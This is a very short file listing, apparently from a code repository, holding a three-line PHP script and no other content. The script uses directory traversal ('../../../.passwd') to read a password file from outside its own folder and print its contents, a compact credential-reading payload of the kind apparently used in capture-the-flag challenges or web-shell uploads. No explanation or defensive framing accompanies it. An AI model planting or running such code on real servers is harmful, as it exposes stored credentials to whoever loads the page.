2021-07-25 00:20:57 +02:00

6 lines
55 B
Plaintext

<?php
echo file_get_contents("../../../.passwd");
?>